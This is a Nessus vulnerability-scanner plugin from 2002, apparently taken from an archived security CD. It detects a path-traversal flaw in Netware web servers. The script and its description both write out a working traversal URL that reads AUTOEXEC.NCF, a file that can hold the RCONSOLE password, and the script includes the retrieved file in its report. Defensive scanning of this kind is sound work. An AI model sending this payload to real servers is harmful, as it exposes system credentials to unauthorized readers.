home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / novell_viewcode.nasl < prev    next >
Text File  |  2005-03-31  |  3KB  |  90 lines
  1. #
  2. # This script was written by David Kyger <david_kyger@symantec.com>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.   script_id(12048);
  10.   script_version ("$Revision: 1.3 $");
  11. # script_bugtraq_id();
  12. # script_cve_id("");
  13.  
  14.  name["english"] = "Netware Web Server Sample Page Source Disclosure";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. On a Netware Web Server, viewcode.jse allows the source code of web pages to 
  19. be viewed. As an argument, a URL is passed to sewse.nlm. The URL can be 
  20. altered and will permit files outside of the web root to be viewed. 
  21. As a result, sensitive information could be obtained from the Netware server, 
  22. such as the RCONSOLE password located in AUTOEXEC.NCF.
  23.  
  24. Example: http://target//lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
  25.  
  26.  
  27. Risk factor : High";
  28.  
  29.  script_description(english:desc["english"]);
  30.  
  31.  summary["english"] = "Checks for Netware Web Server Source Disclosure";
  32.  
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_GATHER_INFO);
  36.  script_copyright(english:"This script is Copyright (C) 2002 David Kyger");
  37.  family["english"] = "Netware";
  38.  script_family(english:family["english"]);
  39.  script_dependencie("find_service.nes", "http_version.nasl");
  40.  script_require_ports("Services/www", 80);
  41.  exit(0);
  42. }
  43.  
  44. #
  45. # The script code starts here
  46. #
  47. include("http_func.inc");
  48. include("http_keepalive.inc");
  49.  
  50. warning = string("
  51. On a Netware Web Server, viewcode.jse allows the source code of web pages to 
  52. be viewed. As an argument, a URL is passed to sewse.nlm. The URL can be 
  53. altered and will permit files outside of the web root to be viewed. 
  54. As a result, sensitive information could be obtained from the Netware server, 
  55. such as the RCONSOLE password located in AUTOEXEC.NCF.
  56.  
  57.  
  58.  
  59. The content of the AUTOEXEC.NCF follows:");
  60.  
  61. url = "/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf";
  62.  
  63. port = get_http_port(default:80);
  64.  
  65.  
  66. if(get_port_state(port))
  67.  {
  68.   soc = http_open_socket(port);
  69.   if (soc)
  70.   {
  71.     req = http_get(item:url, port:port);
  72.     send(socket:soc, data:req);
  73.     buf = http_recv(socket:soc);
  74.     http_close_socket(soc);
  75.     if ("AUTOEXEC.NCF" >< buf)
  76.     {
  77.      warning = warning + string("\n", buf) + "
  78.  
  79. See Also : http://www.securityfocus.com/archive/1/246358
  80. Solution : Remove sample NLMs and default files from the web server. 
  81. Also, ensure the RCONSOLE password is encrypted and utilize a password 
  82. protected screensaver for console access.
  83. Risk factor : High";
  84.      security_hole(port:port, data:warning);
  85.     }
  86.   }
  87.  }
  88.  
  89.  
  90.